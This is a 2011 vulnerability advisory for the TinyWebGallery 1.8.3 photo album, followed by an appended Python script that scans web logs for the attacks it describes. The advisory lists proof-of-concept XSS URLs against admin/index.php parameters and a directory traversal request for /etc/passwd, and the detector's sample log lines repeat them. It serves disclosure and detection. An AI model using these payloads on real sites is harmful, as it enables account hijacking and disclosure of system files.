TinyWebGallery 1.8.3 multiple vulnerabilities

2011-02-04T00:00:00
ID MYHACK58:62201128979
Type myhack58
Reporter Anonymous
Modified 2011-02-04T00:00:00

Description

TinyWebGallery is a PHP photo album program. TinyWebGallery 1.8.3 contains multiple security vulnerabilities, including directory traversal and XSS, which may lead to sensitive information disclosure.

[+]info:
~~~~~~~~~
Script: TinyWebGallery
Version: 1.8.3 (No fixes yet, might work on other versions too).
Home: http://www.tinywebgallery.com

[+]poc:
~~~~~~~~~
http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?dir=<script>alert("xss")</script>
http://localhost/twg183/admin/index.php?action=chmod&item=<script>alert("xss")</script>
http://localhost/twg183/twg183/admin/index.php?action=chmod&item="><script>alert("xss")</script>

http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd

[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/16090
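Because the advisory lists no fix, the practical defensive step is to look for these request shapes in web-server logs. The following Python script is an added example, not part of the original advisory or of TinyWebGallery: it flags requests to `admin/index.php` whose `sview`, `tview`, `dir` or `item` parameters carry markup, or whose `item` parameter carries a `..` path segment. The log lines, function names and regular expressions are constructed for illustration, and a combined-format access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters taken from the advisory's PoC requests to admin/index.php.
XSS_PARAMS = {"sview", "tview", "dir", "item"}
TRAVERSAL_PARAMS = {"item"}  # action=edit&item=../../..
MARKUP = re.compile(r'[<>"]|\bon\w+\s*=', re.I)        # tags, quotes, on*= handlers
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")       # a '..' path segment
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Feb/2011:10:00:00 +0000] "GET /twg183/admin/index.php'
    '?action=edit&item=notes.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [04/Feb/2011:10:00:05 +0000] "GET /twg183/admin/index.php'
    '?sview=%22onmouseover=alert(1);%22 HTTP/1.1" 200 512',
    '192.0.2.11 - - [04/Feb/2011:10:00:09 +0000] "GET /twg183/admin/index.php'
    '?action=edit&item=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 900',
    '192.0.2.11 - - [04/Feb/2011:10:00:12 +0000] "GET /twg183/admin/index.php'
    '?action=chmod&item=%3Cscript%3Ealert(%22xss%22)%3C/script%3E HTTP/1.1" 200 512',
]

def classify(target):
    """Return sorted findings such as 'xss:sview' for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/index.php"):
        return []
    findings = set()
    # parse_qsl percent-decodes once, so %3Cscript%3E and ..%2F are covered.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in XSS_PARAMS and MARKUP.search(value):
            findings.add("xss:" + name)
        if name in TRAVERSAL_PARAMS and TRAVERSAL.search(value):
            findings.add("traversal:" + name)
    return sorted(findings)

def scan(lines):
    """Return (line_number, findings) for every log line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        found = classify(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, ", ".join(found))
```

Values are decoded only once, so double-encoded input needs a second decoding pass before matching.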